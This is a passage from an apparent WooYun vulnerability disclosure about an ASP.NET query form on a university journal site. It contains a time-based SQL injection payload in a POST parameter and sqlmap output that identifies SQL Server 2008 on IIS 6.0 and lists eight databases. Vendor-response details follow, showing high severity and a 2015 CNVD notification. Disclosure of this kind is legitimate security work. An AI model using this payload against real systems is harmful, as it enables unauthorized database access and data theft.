gc3JjPScvVXBsb2FkL0FkSW1hZ2VzL2M0OGU0MjA0LTcyY2MtNDA1OS1hOGUxLTkyYzY4YTBiZjdiOS5
qcGcnIC8+PC9hPmRkAgIPFgIfCQICFgQCAQ9kFgJmDxUCATEM57yW6L6R5LmL5a62ZAICD2QWAmYPFQI
BMgznn6XlhYjkv6Hmga9kAgQPEA8WAh8CaGRkFgBkAgYPZBYCZg8WAh4JaW5uZXJodG1sBT88cD7lvZP
liY3lnKjnur/kurrmlbDvvJo2PC9wPjxQPuaAu+iuv+mXrumHj+e7n+iuoe+8mjIwODk4NDwvcD5kAgc
PZBYCAgEPDxYCHwEFhAI8c3Ryb25nPkNvcHlyaWdodCAyMDA5Q2hpbmEgQWxsIFJpZ2h0cyBSZXNlcnZ
lZCA8YnIgLz7jgIrlhoXokpnlj6TlpKflrablrabmiqXjgIvvvIjlk7LlrabnpL7kvJrnp5HlrabniYj
vvInniYjmnYM8YnIgLz48L3N0cm9uZz48YSBocmVmPSJtYWlsdG86bmR4YnJ3c2tAaW11LmVkdS5jbiI
+PHNwYW4gc3R5bGU9IkNPTE9SOiAjMzMzMzMzIj48c3Ryb25nPm5keGJyd3NrQGltdS5lZHUuY248L3N
0cm9uZz48L3NwYW4+PC9hPjxzdHJvbmc+IDwvc3Ryb25nPmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9
zdEJhY2tLZXlfXxYBBRhjdGwwMCRjcGhDb250ZWN0JGNiQWdyZWXHv4qkisgdu887c9TGFESMw6+m0g=
=&__VIEWSTATEGENERATOR=799CC77D&ctl00$cphContect$txtName=-5371' OR 4504=(SELECT
COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys
4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'uTMB'='uTMB&ctl00$cph
Contect$cbAgree=on&ctl00$cphContect$btnQuery= %CF%C2%D2%BB%B2%BD
---
[20:28:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[20:28:26] [INFO] fetching database names
[20:28:33] [WARNING] reflective value(s) found and filtering out
[20:28:33] [INFO] the SQL query used returns 8 entries
[20:28:33] [INFO] resumed: master
[20:28:33] [INFO] resumed: model
[20:28:33] [INFO] resumed: msdb
[20:28:33] [INFO] resumed: nmgskb
[20:28:33] [INFO] resumed: nmgzkb
[20:28:33] [INFO] resumed: ReportServer$SQLEXPRESS
[20:28:33] [INFO] resumed: ReportServer$SQLEXPRESSTempDB
[20:28:33] [INFO] resumed: tempdb
available databases [8]:
[*] master
[*] model
[*] msdb
[*] nmgskb
[*] nmgzkb
[*] ReportServer$SQLEXPRESS
[*] ReportServer$SQLEXPRESSTempDB
[*] tempdb

修复方案:

RT

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-04-03 18:35

厂商回复:

已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。

最新状态:

暂无

漏洞评价:

评论